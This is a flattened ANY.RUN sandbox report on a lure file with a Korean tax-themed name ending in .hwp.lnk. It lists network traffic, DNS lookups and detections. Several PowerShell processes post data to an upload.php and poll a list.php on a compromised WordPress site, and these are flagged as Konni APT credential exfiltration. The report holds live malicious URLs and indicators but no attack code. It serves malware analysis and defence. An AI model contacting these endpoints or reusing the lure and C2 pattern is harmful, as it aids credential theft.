PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7024
SIHClient.exe
GET
200
23.209.214.100:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
ID
binary
408 b
whitelisted
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
binary
471 b
whitelisted
7024
SIHClient.exe
GET
200
23.209.214.100:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
ID
binary
419 b
whitelisted
648
powershell.exe
POST
200
31.11.36.13:80
http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php
IT
malicious
2136
backgroundTaskHost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
US
binary
471 b
whitelisted
6940
powershell.exe
POST
200
31.11.36.13:80
http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php
IT
malicious
6320
powershell.exe
GET
200
31.11.36.13:80
http://www.fantasiasognorealta.com/wp-includes/js/src/list.php?638730382673256135=0WP0hsq2iepw1JlRZR3GALnj4WvS
IT
malicious
6688
powershell.exe
POST
200
31.11.36.13:80
http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php
IT
malicious
6356
powershell.exe
POST
200
31.11.36.13:80
http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php
IT
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1176
svchost.exe
40.126.32.68:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1076
svchost.exe
184.28.89.167:443
go.microsoft.com
AKAMAI-AS
US
whitelisted
5064
SearchApp.exe
2.21.65.154:443
www.bing.com
Akamai International B.V.
NL
whitelisted
3568
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5464
powershell.exe
162.241.219.212:443
raleighice.com
OIS1
US
unknown
4
System
192.168.100.255:137
whitelisted
7024
SIHClient.exe
20.12.23.50:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
login.live.com
  • 40.126.32.68
  • 40.126.32.136
  • 40.126.32.76
  • 20.190.160.22
  • 40.126.32.140
  • 40.126.32.134
  • 20.190.160.20
  • 20.190.160.14
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.104.136.2
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
www.bing.com
  • 2.21.65.154
  • 2.21.65.132
whitelisted
raleighice.com
  • 162.241.219.212
unknown
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
www.microsoft.com
  • 23.209.214.100
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted
www.fantasiasognorealta.com
  • 31.11.36.13
malicious
arc.msn.com
  • 20.74.47.205
whitelisted

Threats

PID
Process
Class
Message
648
powershell.exe
Successful Credential Theft Detected
SPYWARE [ANY.RUN] Konni.APT Exfiltration
6688
powershell.exe
Successful Credential Theft Detected
SPYWARE [ANY.RUN] Konni.APT Exfiltration
6940
powershell.exe
Successful Credential Theft Detected
SPYWARE [ANY.RUN] Konni.APT Exfiltration
6356
powershell.exe
Successful Credential Theft Detected
SPYWARE [ANY.RUN] Konni.APT Exfiltration
6320
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
오류발견 수정신고 제출 요청 안내(국세징수법 시행규칙).hwp.lnk